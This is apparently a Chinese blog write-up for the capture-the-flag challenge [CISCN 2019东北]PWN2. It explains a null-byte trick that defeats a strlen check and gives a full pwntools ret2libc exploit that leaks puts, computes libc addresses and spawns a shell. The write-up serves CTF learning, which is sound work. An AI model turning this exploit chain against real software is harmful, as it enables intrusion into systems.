nssctf刷题总结

首先就是关于"\x00"截断问题,'\x00'被当做字符串的截止字符,这就很有趣了我们可以把\x00放在我们要发送数据的前面,经过\x00截断,后面的数据就不用读入了。。。。。。嘿嘿,好像听起来没什么用,确实我们在一般情况下需要注意这个问题,不能有\x00截断。现在我们要想想如何利用它,用它过检测机制如strlen一类的。当strlen检测字符串长度时检测到\x00就会发生截断,自然绕过了检测,结果就是null即0。

例题:[CISCN 2019东北]PWN2

开始审计代码:上来就是死循环,fflush清空缓冲区,读入v4是整数,我们看看begin,一点用没有.

只有v4=1的时候 跳出轮回流,进入encrypt函数,然后begin。。。。既然begin函数没有用,那转机就在encrypt函数了

非常好,栈溢出啊,一定要溢出才行哦,不然不能getshell的qwq。看看下面的各种逆天映射,博🐖在第一次看的时候也是头昏眼花,本着小白的可爱,想着完成他的映射,后来实在射不出来,回头看了遍程序突然发现不用射了,可以直接绕过,吆西,管他映射干嘛,我用的可是溢出啊。

直接\x00不让strlen开始射前准备,打断施法。这样v0肯定大于strlen(s)直接break,吆西。

exp:

复制代码
from pwn import *
from struct import pack
from ctypes import *
import base64
import gmpy2
def s(a):
    p.send(a)
def sla(a,b):
    p.sendlineafter(a,b)
def sl(a):
    p.sendline(a)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'],libc_base + next(libc.search(b'/bin/sh\x00'))
    
context(os='linux',arch='amd64',log_level='debug')
p= process('./CISCN2019')
elf=ELF('./CISCN2019')
rdi=0x0000000000400c83
libc=ELF("libc6_2.27-0ubuntu3_amd64.so")
sla("choice!",b'1')
payload=b'\x00'+b'a'*(0x57)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4009a0)
sla("Input your Plaintext to be encrypted",payload)
puts=get_addr()
print(hex(puts))
addr=puts-libc.sym['puts']
print(hex(addr))
sh=addr+next(libc.search(b'/bin/sh\x00'))
system=addr+libc.sym['system']
pay1=b'\x00'+b'a'*(0x57)+p64(rdi)+p64(sh)+p64(rdi+1)+p64(system)
sla('Input your Plaintext to be encrypted',pay1)
inter()
相关推荐
用户83562907805143 分钟前
从手动编辑到代码生成:Python 助你高效创建 Word 文档
后端·python
侃侃_天下44 分钟前
最终的信号类
开发语言·c++·算法
c8i1 小时前
python中类的基本结构、特殊属性于MRO理解
python
echoarts1 小时前
Rayon Rust中的数据并行库入门教程
开发语言·其他·算法·rust
liwulin05061 小时前
【ESP32-CAM】HELLO WORLD
python
Aomnitrix1 小时前
知识管理新范式——cpolar+Wiki.js打造企业级分布式知识库
开发语言·javascript·分布式
Doris_20232 小时前
Python条件判断语句 if、elif 、else
前端·后端·python
Doris_20232 小时前
Python 模式匹配match case
前端·后端·python
每天回答3个问题2 小时前
UE5C++编译遇到MSB3073
开发语言·c++·ue5
伍哥的传说2 小时前
Vite Plugin PWA – 零配置构建现代渐进式Web应用
开发语言·前端·javascript·web app·pwa·service worker·workbox